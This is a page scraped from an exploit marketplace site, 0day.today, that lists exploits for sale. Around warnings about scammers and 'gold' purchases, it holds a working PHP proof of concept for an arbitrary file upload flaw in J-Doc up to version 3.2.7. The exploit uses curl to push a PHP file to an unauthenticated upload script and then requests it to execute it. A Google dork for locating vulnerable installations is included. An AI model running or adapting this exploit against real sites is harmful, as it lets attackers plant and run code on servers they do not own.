0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
J-Doc <= v3.2.7 Arbitrary file upload
<?php # Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload # Date: 2012-08-10 # Author: leviathan # Vendor or Software Link: http://www.j-doc.com/ # Version: <= 3.2.7 # Category:: webapps # Google dork: intext:"Système de partage de documents par Projet" # Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2 # Demo site: // The vulnerable website $base_url = 'http://localhost/jdoc/'; $file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'info.php'; $file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME); $folder = '.'; // related to the divers folder $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder); curl_setopt($curl, CURLOPT_POST, true); $post = array( 'Filedata' => '@'.$file_to_upload, ); curl_setopt($curl, CURLOPT_POSTFIELDS, $post); if (curl_exec($curl)) { echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call); } else { die('error in the exploit'); } # 0day.today [2024-12-24] #